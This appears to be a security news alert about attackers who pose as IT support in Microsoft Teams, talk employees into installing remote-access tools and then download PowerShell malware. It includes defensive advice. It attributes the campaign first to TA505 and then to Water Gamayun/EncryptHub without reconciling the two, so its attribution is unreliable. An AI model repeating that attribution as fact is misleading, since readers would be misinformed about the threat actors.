Unscrupulous Hackers Exploit Microsoft Teams for PowerShell-Driven Malware, Enabling Unauthorized Windows Access Remotely
Cybersecurity Alert: Threat Actors Use Microsoft Teams to Deploy Malware
In a concerning development, cybercriminals have been found using Microsoft Teams to deploy malware and gain control of victim systems. This revelation comes from recent analyses by Permiso cybersecurity researchers, who have uncovered a multi-stage attack that begins with a simple message and culminates in the deployment of potent, multifunctional malware.
The financially motivated threat group TA505 is believed to be behind these attacks, as they have been linked to PowerShell-based malware use involving Microsoft Teams. The malicious script, equipped with capabilities for credential theft, establishing long-term persistence, and remote code execution, is the primary tool used in these campaigns.
The attackers start by impersonating IT support staff in Microsoft Teams chats. They trick employees into granting remote access by building rapport and persuading them to install remote access software like QuickAssist or AnyDesk. To add authenticity, they often use checkmark emojis to simulate a verified status and leverage Microsoft's domain structure to appear as if they are part of the organization.
Once remote access is secured, the attacker executes a PowerShell command to download the primary malicious payload. Analysis of the payload's code revealed hardcoded encryption keys linking the campaign to the financially motivated threat actor tracked as Water Gamayun (also known as EncryptHub). This group has a history of combining sophisticated social engineering with custom malware to target English-speaking IT professionals and developers.
These newer campaigns are more direct, often forgoing the preliminary mass email campaigns seen in the past. The malware can designate its own process as "critical," which would cause the system to crash if terminated. The malicious payloads in recent incidents have involved DarkGate and Matanbuchus malware loaders.
To protect against these attacks, a defense-in-depth strategy, combining technical controls with robust user education, is essential. Employees must be trained to remain vigilant against unsolicited contact, even on trusted internal platforms. All requests for credentials or the installation of remote access software should be independently verified through a known, separate communication channel.
It is crucial to stay informed about the latest threats and to implement robust security measures to protect your organisation from such attacks. By doing so, we can collectively work towards a safer digital environment.
